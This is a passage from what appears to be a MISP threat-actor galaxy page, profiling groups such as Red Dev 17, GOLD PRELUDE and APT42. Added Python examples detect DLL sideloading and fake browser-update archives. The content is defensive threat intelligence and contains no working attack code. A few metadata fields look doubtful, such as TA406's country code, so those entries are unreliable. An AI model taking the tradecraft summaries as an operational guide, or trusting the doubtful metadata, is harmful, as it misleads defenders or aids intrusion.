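In the sample, 203.0.113.10 produces six failures in 14 seconds against Administrator and other common names and then a successful Administrator logon, so it is alerted; 198.51.100.7 produces two failures an hour apart (a user mistyping a password) and stays silent. On a real estate, feed the detector from the Security log's 4625/4624 events and tune the window and threshold to the baseline of the RDP hosts in question.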
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PARINACOTA.
Known Synonyms |
---|
Wine Tempest |
Internal MISP references
UUID 4245e4cd-a57a-4e0b-9853-acaa549d495d
which can be used as unique global reference for PARINACOTA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Red Dev 17
In 2021, PwC started tracking a series of intrusions under the moniker Red Dev 17 that it assesses were highly likely conducted by a China-based threat actor. PwC's analysis suggests Red Dev 17 has been active since at least 2017. Red Dev 17's observed targets are mainly in India and include the Indian military, a multinational India-based technology company, and a state energy company. PwC assesses that it is highly probable that the threat actor behind intrusions associated with Red Dev 17 is also responsible for the campaign known in open source as Operation NightScout. Red Dev 17 uses the 8.t document weaponisation framework (also known as RoyalRoad), and abuses benign utilities such as Logitech or Windows Defender binaries to sideload and execute Chinoxy or PoisonIvy variants on victim systems. PwC identified capability and infrastructure links between Red Dev 17 and the threat actor it calls Red Hariasa (aka FunnyDream APT), as well as infrastructure overlaps with Red Wendigo (aka Icefog, RedFoxtrot) and with ShadowPad C2 servers. At the time of writing, PwC did not have sufficient evidence to directly link Red Dev 17 to any of these threat actors; it does, however, assess with realistic probability that Red Dev 17 operates within a cluster of threat actors that share tools and infrastructure, as well as a strong targeting focus on Southeast Asia and Central Asia.
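The sideloading pattern above (a trusted, vendor-signed binary loading an attacker-supplied DLL from its own directory) can be hunted for in image-load telemetry. The following Python is an added example, not code from PwC or from the original page; it runs over constructed records modelled on Sysmon Event ID 7 fields and flags a host binary from a small allowlist that loads an unsigned DLL from the directory it runs in, with higher severity when that binary is executing outside its expected install path. The allowlist entries, the Logitech file name, the DLL names and the paths are assumptions for the example.

```python
import ntpath
import re
from dataclasses import dataclass

# Hypothetical allowlist for this example: file names of vendor-signed executables that are
# attractive sideloading hosts, mapped to the lower-case directory prefixes they are normally
# installed under. MsMpEng.exe is the Windows Defender engine; the Logitech file name is an
# assumption, not a name taken from the PwC reporting.
TRUSTED_HOSTS = {
    "msmpeng.exe": (
        r"c:\programdata\microsoft\windows defender\platform",
        r"c:\program files\windows defender",
    ),
    "logitechupdater.exe": (
        r"c:\program files\logitech",
        r"c:\program files (x86)\logitech",
    ),
}

# Constructed image-load records modelled on Sysmon Event ID 7 fields: Image is the loading
# process, ImageLoaded the DLL, Signed/Signature describe the DLL. Made up for this example.
SAMPLE_EVENTS = r"""
Image=C:\Users\Public\Music\MsMpEng.exe|ImageLoaded=C:\Users\Public\Music\mpsvc.dll|Signed=false|Signature=
Image=C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe|ImageLoaded=C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\mpsvc.dll|Signed=true|Signature=Microsoft Windows
Image=C:\Users\alice\AppData\Local\Temp\LogitechUpdater.exe|ImageLoaded=C:\Windows\System32\kernel32.dll|Signed=true|Signature=Microsoft Windows
Image=C:\Users\alice\AppData\Local\Temp\LogitechUpdater.exe|ImageLoaded=C:\Users\alice\AppData\Local\Temp\version.dll|Signed=false|Signature=
Image=C:\Program Files\Logitech\LogitechUpdater.exe|ImageLoaded=C:\Program Files\Logitech\version.dll|Signed=false|Signature=
"""

LINE_RE = re.compile(
    r"Image=(?P<image>[^|]+)\|ImageLoaded=(?P<dll>[^|]+)\|"
    r"Signed=(?P<signed>true|false)\|Signature=(?P<sig>.*)$"
)


@dataclass
class Finding:
    process: str
    dll: str
    severity: str
    reason: str


def in_expected_dir(image: str, prefixes) -> bool:
    """True if the host binary sits under one of its known install directories."""
    return any(image.lower().startswith(p) for p in prefixes)


def detect_sideloading(text: str):
    """Flag allowlisted host binaries that load an unsigned DLL from their own directory."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        image, dll = m.group("image"), m.group("dll")
        signed = m.group("signed") == "true"
        host = ntpath.basename(image).lower()
        if host not in TRUSTED_HOSTS:
            continue
        same_dir = ntpath.dirname(image.lower()) == ntpath.dirname(dll.lower())
        if signed or not same_dir:
            continue  # signed DLLs, or DLLs resolved from system paths, are the normal case
        if in_expected_dir(image, TRUSTED_HOSTS[host]):
            findings.append(Finding(image, dll, "medium",
                                    "unsigned DLL loaded from the host binary's own install directory"))
        else:
            findings.append(Finding(image, dll, "high",
                                    "host binary running outside its expected install path "
                                    "loaded an unsigned DLL from its own directory"))
    return findings


if __name__ == "__main__":
    for f in detect_sideloading(SAMPLE_EVENTS):
        print(f.severity, f.process, "->", f.dll, ":", f.reason)
```

The two copies of the host binaries dropped under a user-writable path (Public\Music, AppData\Local\Temp) that load an unsigned DLL next to themselves are rated high; the Defender engine loading a Microsoft-signed DLL from its platform directory and the updater loading kernel32.dll from System32 are ignored; an unsigned DLL appearing inside the legitimate install directory is still surfaced at medium severity, since that is what a sideload planted into the real install location looks like.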
Internal MISP references
UUID 50d61877-bfc7-4c65-980e-c0589b5561fa
which can be used as unique global reference for Red Dev 17
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['India'] |
cfr-target-category | ['High-Tech', 'Military', 'Energy'] |
country | CN |
Aoqin Dragon
SentinelLabs has uncovered a cluster of activity, tracked as 'Aoqin Dragon', beginning at least as far back as 2013 and continuing to the present day, primarily targeting organizations in Southeast Asia and Australia. SentinelLabs assesses that the threat actor's primary focus is espionage, with targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. The threat actor has a history of using document lures with pornographic themes to infect users and makes heavy use of USB shortcut techniques to spread its malware and infect additional targets. Attacks attributable to Aoqin Dragon typically drop one of two backdoors: Mongall or a modified version of the open-source Heyoka project.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aoqin Dragon.
Known Synonyms |
---|
UNC94 |
Internal MISP references
UUID fa1fdccb-1a06-4607-bd45-1a7df4db02d7
which can be used as unique global reference for Aoqin Dragon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Australia', 'Cambodia', 'Hong Kong', 'Singapore', 'Vietnam'] |
cfr-target-category | ['Government', 'Education', 'Telecommunications'] |
country | CN |
DangerousSavanna
A malicious campaign called DangerousSavanna has been targeting multiple major financial service groups in French-speaking Africa for the last two years. The threat actors behind this campaign use spear-phishing as the means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. DangerousSavanna tends to install relatively unsophisticated tooling in the infected environments, both self-written and based on open-source projects such as Metasploit, PoshC2, DWService, and AsyncRAT. The threat actors' creativity is on display in the initial infection stage: they persistently pursue the employees of the targeted companies, constantly changing infection chains that use a wide range of malicious file types, from self-written executable loaders and malicious documents to ISO, LNK, JAR and VBE files in various combinations. The evolving infection chains reflect the changes seen in the wider threat landscape over the past few years, as infection vectors have become more sophisticated and diverse.
Internal MISP references
UUID 1bb64526-cc51-475a-b6bc-af30df9f2fb6
which can be used as unique global reference for DangerousSavanna
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ivory Coast', 'Morocco', 'Cameroon', 'Senegal', 'Togo'] |
threat-actor-classification | ['campaign'] |
Hezb
Hezb is a group that deploys cryptominers as soon as new exploits become available for public-facing vulnerabilities. The name is taken from the miner process they deploy.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hezb.
Known Synonyms |
---|
Mimo |
Internal MISP references
UUID fd82cd40-9306-4285-8fae-ad29a9711603
which can be used as unique global reference for Hezb
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
NoName057(16)
NoName057(16) performs DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more, in Ukraine and in neighboring countries that support Ukraine, such as Estonia, Lithuania, Norway, and Poland.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NoName057(16).
Known Synonyms |
---|
05716nnm |
Nnm05716 |
NoName057 |
NoName05716 |
Internal MISP references
UUID e62937d0-dec6-4c39-a836-e43b1d138df4
which can be used as unique global reference for NoName057(16)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Czech Republic', 'Denmark', 'Estonia', 'Lithuania', 'NATO', 'Norway', 'Poland', 'Ukraine'] |
cfr-target-category | ['Financial', 'Government', 'Military', 'Telecommunications', 'Transportation'] |
cfr-type-of-incident | ['Denial of service'] |
BITWISE SPIDER
BITWISE SPIDER has recently and quickly become a significant player in the big game hunting (BGH) landscape. Their dedicated leak site (DLS) has received the highest number of victims posted each month since July 2021 compared to other adversary DLSs due to the growing popularity and effectiveness of LockBit 2.0.
Internal MISP references
UUID ecf4d7cb-9bf7-4d9d-8450-c99e885b9aac
which can be used as unique global reference for BITWISE SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/ - webarchive
- https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/ - webarchive
- https://security.packt.com/understanding-lockbit/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Void Balaur
Void Balaur is a highly active hack-for-hire / cyber mercenary group with a wide range of known target types across the globe. Their services have been observed for sale to the public online since at least 2016. Services include the collection of private data and access to specific online email and social media services, such as Gmail, Outlook, Telegram, Yandex, Facebook, Instagram, and business emails.
Internal MISP references
UUID ca310f0a-1131-4c67-b0a7-f1cd4ce0f87f
which can be used as unique global reference for Void Balaur
in MISP communities and other software using the MISP galaxy
External references
- https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/ - webarchive
- https://blog.google/threat-analysis-group/countering-hack-for-hire-groups/ - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf - webarchive
- https://www.amnesty.org/en/latest/research/2020/03/targeted-surveillance-attacks-in-uzbekistan-an-old-threat-with-new-techniques/ - webarchive
- https://equalit.ie/deflect-labs-report-6/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Brazil', 'Central African Republic', 'Georgia', 'Kazakhstan', 'Moldova', 'Russia', 'Spain', 'Sudan', 'Taiwan', 'Ukraine', 'United Kingdom', 'United States'] |
APT-C-60
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-60.
Known Synonyms |
---|
APT-Q-12 |
Internal MISP references
UUID 6a83b2bf-0c51-4c9b-89b0-35df7cab1dd5
which can be used as unique global reference for APT-C-60
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RomCom
ROMCOM is an evolving and sophisticated threat actor group that has been using the malware tool ROMCOM for espionage and financially motivated attacks. They have targeted organizations in Ukraine and NATO countries, including military personnel, government agencies, and political leaders. The ROMCOM backdoor is capable of stealing sensitive information and deploying other malware, showcasing the group's adaptability and growing sophistication.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RomCom.
Known Synonyms |
---|
Storm-0978 |
Internal MISP references
UUID ba9e1ed2-e142-48d0-a593-f73ac6d59ccd
which can be used as unique global reference for RomCom
in MISP communities and other software using the MISP galaxy
External references
- https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass - webarchive
- https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries - webarchive
- https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html - webarchive
- https://labs.k7computing.com/index.php/romcom-rat-not-your-typical-love-story/ - webarchive
- https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection - webarchive
- https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | RU |
GOLD PRELUDE
GOLD PRELUDE is a financially motivated cybercriminal threat group that operates the SocGholish (aka FAKEUPDATES) malware distribution network. GOLD PRELUDE operates a large global network of compromised websites, frequently running vulnerable content management systems (CMS), that redirect into a malicious traffic distribution system (TDS). The TDS, which researchers at Avast have named Parrot TDS, uses opaque criteria to select victims to serve a fake browser update page. These pages, which are customized to the specific visiting browser software, download the JavaScript-based SocGholish payload frequently embedded within a compressed archive.
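The delivery chain above ends with a compressed archive whose only content is a JavaScript file dressed up as a browser update. The following Python is an added example (not GOLD PRELUDE tooling, nor code from the original page) that builds such an archive in memory alongside two benign ones and scores each on three heuristics a web proxy or mail gateway could apply to downloaded archives: a single script member, an update- or browser-themed file name, and use of Windows Script Host objects in the script body. The archive contents, the file names, the script extensions list and the two-flag threshold are assumptions for the example.

```python
import io
import os
import re
import zipfile

# Extensions Windows Script Host or mshta will execute directly on double-click (assumed list).
SCRIPT_EXTS = {".js", ".jse", ".wsf", ".vbs", ".hta"}
UPDATE_NAME_RE = re.compile(r"update|chrome|firefox|edge|browser", re.I)
# Objects a WSH-hosted script uses to spawn processes or talk to the network.
WSH_RE = re.compile(r"\b(?:WScript|ActiveXObject)\b")


def build_zip(members):
    """Build an in-memory ZIP from {name: str|bytes}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed stand-ins. The "update" script is a harmless placeholder that merely
# references WSH objects; it is not a real payload.
FAKE_UPDATE_ZIP = build_zip({
    "Chrome.Update.js": 'var sh = new ActiveXObject("WScript.Shell");\n'
                        'WScript.Echo("constructed stand-in, not a real payload");\n',
})
BENIGN_DOCS_ZIP = build_zip({
    "report.pdf": b"%PDF-1.4\n%constructed placeholder\n",
    "notes.txt": b"quarterly notes\n",
})
BENIGN_BUNDLE_ZIP = build_zip({
    "app/index.js": 'console.log("hello");\n',
    "app/package.json": "{}\n",
})


def inspect_archive(data: bytes) -> dict:
    """Return the member list, the heuristics that fired, and a verdict for one archive."""
    flags = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = [i for i in zf.infolist() if not i.is_dir()]
        names = [i.filename for i in infos]
        scripts = [n for n in names if os.path.splitext(n)[1].lower() in SCRIPT_EXTS]
        if len(infos) == 1 and scripts:
            flags.append("single_script_member")
        for n in scripts:
            if UPDATE_NAME_RE.search(os.path.basename(n)):
                flags.append("update_themed_script_name")
            body = zf.read(n).decode("utf-8", "replace")
            if WSH_RE.search(body):
                flags.append("wsh_objects_in_script")
    verdict = "suspicious" if len(flags) >= 2 else "benign"
    return {"members": names, "flags": flags, "verdict": verdict}


if __name__ == "__main__":
    for label, blob in [("fake update", FAKE_UPDATE_ZIP),
                        ("documents", BENIGN_DOCS_ZIP),
                        ("js bundle", BENIGN_BUNDLE_ZIP)]:
        print(label, inspect_archive(blob))
```

Requiring two flags keeps ordinary JavaScript bundles (several members, no WSH objects) out of the alert queue while the lone "Chrome.Update.js" trips all three. Pair the archive check with the referring page: a ZIP arriving immediately after a visit to a site that is not a browser vendor's download domain is the rest of the picture described above.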
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOLD PRELUDE.
Known Synonyms |
---|
TA569 |
UNC1543 |
Internal MISP references
UUID 8134c96d-d6ed-49cc-99d6-fe74c0636387
which can be used as unique global reference for GOLD PRELUDE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
BazarCall
BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. The technique is reminiscent of vishing and tech support scams, where potential victims are cold-called by the attacker, except that in BazarCall's case the targeted users must dial the number themselves. When they do, they are connected to actual humans on the other end of the line, who then provide step-by-step instructions for installing malware on their devices.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BazarCall.
Known Synonyms |
---|
BazaCall |
BazzarCall |
Internal MISP references
UUID 906e2091-cc32-499e-a799-2b9b15e45042
which can be used as unique global reference for BazarCall
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Evasive Panda
Evasive Panda is an APT group that has been active since at least 2012, conducting cyberespionage targeting individuals, government institutions and organizations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Evasive Panda.
Known Synonyms |
---|
BRONZE HIGHLAND |
Internal MISP references
UUID 171d0590-be92-443f-addb-af5dc2a8034d
which can be used as unique global reference for Evasive Panda
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Hong Kong', 'India', 'Malaysia', 'Taiwan'] |
cfr-target-category | ['Government', 'Individuals', 'Universities'] |
cfr-type-of-incident | Espionage |
country | CN |
TAG-53
A Russia-linked threat actor tracked as TAG-53 is running phishing campaigns impersonating various defense, aerospace, and logistic companies, according to The Record by Recorded Future. Recorded Future’s Insikt Group identified overlaps with a threat actor tracked by other companies as Callisto Group, COLDRIVER, and SEABORGIUM.
Internal MISP references
UUID e5865ca1-ec95-43e2-954a-d0f3507a9747
which can be used as unique global reference for TAG-53
in MISP communities and other software using the MISP galaxy
External references
- https://blog.knowbe4.com/russian-threat-actor-impersonates-aerospace-and-defense-companies - webarchive
- https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations?utm_campaign=PostBeyond&utm_source=Twitter&utm_medium=359877&utm_term=Exposing+TAG-53%E2%80%99s+Credential+Harvesting+Infrastructure+Used+for+Russia-Aligned+Espionage+Operations - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-1205.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Malteiro
This group of cybercriminals was named Malteiro by SCILabs; they operate and distribute the URSA/Mispadu banking trojan.
Internal MISP references
UUID ba57c28a-47d0-46ba-a933-9aed69f7b84f
which can be used as unique global reference for Malteiro
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Moskalvzapoe
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Moskalvzapoe.
Known Synonyms |
---|
MAN1 |
TA511 |
Internal MISP references
UUID 66a0a3ad-5b07-4876-baee-cf44000f7470
which can be used as unique global reference for Moskalvzapoe
in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618 - webarchive
- https://vixra.org/abs/1902.0257 - webarchive
- https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/ - webarchive
- https://unit42.paloaltonetworks.com/threat-brief-hancitor-actors/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
TA570
TA570 is one of the most active Qbot malware affiliates; Proofpoint has tracked this large cybercrime threat actor since 2018.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA570.
Known Synonyms |
---|
DEV-0450 |
Internal MISP references
UUID 82a808ad-3f2f-43c0-bd15-848a6e27da95
which can be used as unique global reference for TA570
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://therecord.media/hackers-using-follina-windows-zero-day-to-spread-qbot-malware/ - webarchive
- https://isc.sans.edu/diary/TA570+Qakbot+Qbot+tries+CVE202230190+Follina+exploit+msmsdt/28728 - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Related clusters
To see the related clusters, click here.
TA575
TA575 is a Dridex affiliate tracked by Proofpoint since late 2020. This group distributes malware such as Dridex, Qakbot, and WastedLocker via malicious URLs, Office attachments, and password-protected files. On average, TA575 distributes almost 4,000 messages per campaign impacting hundreds of organizations.
Internal MISP references
UUID fbb04514-f71d-4a95-a1af-727d21ef12a2
which can be used as unique global reference for TA575
in MISP communities and other software using the MISP galaxy
External references
- https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware - webarchive
- https://www.zdnet.com/article/ta575-criminal-group-using-squid-game-lures-for-dridex-malware/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
TA577
TA577 is a prolific cybercrime threat actor tracked by Proofpoint since mid-2020. This actor conducts broad targeting across various industries and geographies, and Proofpoint has observed TA577 deliver payloads including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA577.
Known Synonyms |
---|
Hive0118 |
Internal MISP references
UUID e405b7d0-3eed-4f9d-9b68-728e9793974c
which can be used as unique global reference for TA577
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html - webarchive
- https://www.itpro.com/security/ransomware/359919/ransomware-criminals-look-to-other-hackers-to-provide-them-with-network - webarchive
- https://exchange.xforce.ibmcloud.com/threat-group/guid:1dda890fa2662ed26b451c703e922315 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Related clusters
To see the related clusters, click here.
TA2536
TA2536, active since at least 2015, is likely Nigerian based on its unique linguistic style, tactics, and tools. It uses keyloggers such as HawkEye, shows distinctive stylometric features in typo-squatted domains that resemble legitimate names, and reuses recurring names and substrings in its email addresses.
Internal MISP references
UUID 9687a6a9-0a66-4373-b546-60553857a442
which can be used as unique global reference for TA2536
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | NG |
Related clusters
To see the related clusters, click here.
DEV-0147
DEV-0147 is a China-based cyber espionage actor that was observed compromising diplomatic targets in South America, a notable expansion of the group's data exfiltration operations, which traditionally targeted government agencies and think tanks in Asia and Europe. DEV-0147 is known to use tools such as ShadowPad, a remote access trojan associated with other China-based actors, to maintain persistent access, and QuasarLoader, a webpack loader, to deploy additional malware. DEV-0147's attacks in South America included post-exploitation activity involving the abuse of on-premises identity infrastructure for reconnaissance and lateral movement, and the use of Cobalt Strike for command and control and data exfiltration.
Internal MISP references
UUID 85f20141-1c8e-49ac-b963-eaa1fb1f4018
which can be used as unique global reference for DEV-0147
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['South America', 'Asia', 'European Union'] |
country | CN |
TA406
TA406 engages in malware distribution, phishing, intelligence collection, and cryptocurrency theft, spanning a wide range of criminal activities.
Internal MISP references
UUID 89f005f9-22e9-4c50-9b48-e94c521266e5
which can be used as unique global reference for TA406
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['China', 'France', 'Germany', 'India', 'Japan', 'North America', 'Russia', 'South Africa', 'South Korea', 'United Kingdom'] |
cfr-target-category | ['Government', 'Journalists', 'NGOs'] |
country | KR |
APT42
APT42 is an Iranian state-sponsored cyber espionage group tasked with conducting information collection and surveillance operations against individuals and organizations of strategic interest to the Iranian government.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT42.
Known Synonyms |
---|
CALANQUE |
UNC788 |
Internal MISP references
UUID 35f887ad-6709-4d0b-8e9c-6b3fa09c783f
which can be used as unique global reference for APT42
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Australia', 'Europe', 'Israel', 'Middle East', 'US'] |
cfr-target-category | ['Education', 'Government', 'Military', 'Defense', 'Energy', 'Finance', 'Healthcare', 'Pharmaceuticals', 'Civil Society', 'Legal', 'Manufacturing', 'Media', 'NGOs', 'Pharmaceuticals'] |
cfr-type-of-incident | Espionage |
country | IR |
TA453
TA453 has employed compromised accounts, malware, and confrontational lures to go after targets with a range of backgrounds, from medical researchers to realtors to travel agencies.
Internal MISP references
UUID c1d44f44-425e-48fd-b78b-84b988da8bc3
which can be used as unique global reference for TA453
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Chamelgang
In Q2 2021, the PT Expert Security Center incident response team conducted an investigation at an energy company. The investigation revealed that the company's network had been compromised by an unknown group for the purpose of data theft. The team named the group ChamelGang (from the word "chameleon") because the group disguised its malware and network infrastructure as legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chamelgang.
Known Synonyms |
---|
CamoFei |
Internal MISP references
UUID eafdd27f-a3e2-4bb1-ae03-bf9ca5ff0355
which can be used as unique global reference for Chamelgang
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['India', 'Japan', 'Nepal', 'Russia', 'Taiwan', 'US'] |
cfr-target-category | ['Aviation', 'Energy'] |
Karakurt
Karakurt actors have employed a variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Karakurt.
Known Synonyms |
---|
Karakurt Lair |
Internal MISP references
UUID 035fbd5c-e4a1-4c7b-80fb-f5a89a361aed
which can be used as unique global reference for Karakurt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Canada', 'Germany', 'United Kingdom', 'United States'] |
cfr-type-of-incident | Extortion |
DEV-0270
Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS. Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEV-0270.
Known Synonyms |
---|
Nemesis Kitten |
Storm-0270 |
Internal MISP references
UUID 7b90319a-9f7b-466d-9f90-7fcc270ed505
which can be used as unique global reference for DEV-0270
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Prophet Spider
PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by compromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in multiple instances.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Prophet Spider.
Known Synonyms |
---|
GOLD MELODY |
UNC961 |
Internal MISP references
UUID eb0b100c-8a4e-4859-b6f8-eebd66c3d20c
which can be used as unique global reference for Prophet Spider
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/ - webarchive
- https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ - webarchive
- https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker - webarchive
- https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated - webarchive
Associated metadata
Metadata key | Value |
---|---|
country |
TA866
According to Proofpoint, TA866 is a newly identified threat actor that distributes malware via email using both commodity and custom tools. While most of the observed activity occurred since October 2022, Proofpoint researchers identified multiple activity clusters since 2019 that overlap with TA866 activity. Most of the activity recently observed by Proofpoint suggests that recent campaigns are financially motivated; however, an assessment of historic related activities suggests a possible additional espionage objective.
Internal MISP references
UUID a3c22f46-5135-4b39-a33f-92906ac12c31
which can be used as unique global reference for TA866
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
motive | mainly financially motivated, additional espionage objective. |
Anonymous Sudan
Since January 23, 2023, a threat actor identifying as "Anonymous Sudan" has been conducting distributed denial of service (DDoS) attacks against multiple organizations in Sweden. The group claims to be "hacktivists", politically motivated hackers from Sudan. According to Truesec’s report, the threat actor has nothing to do with the online activists collectively known as Anonymous.
Internal MISP references
UUID 8ca38564-5515-45f5-9f3b-a4091546e10b
which can be used as unique global reference for Anonymous Sudan
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Denmark', 'Sweden'] |
cfr-type-of-incident | ['Denial of service'] |
RedGolf
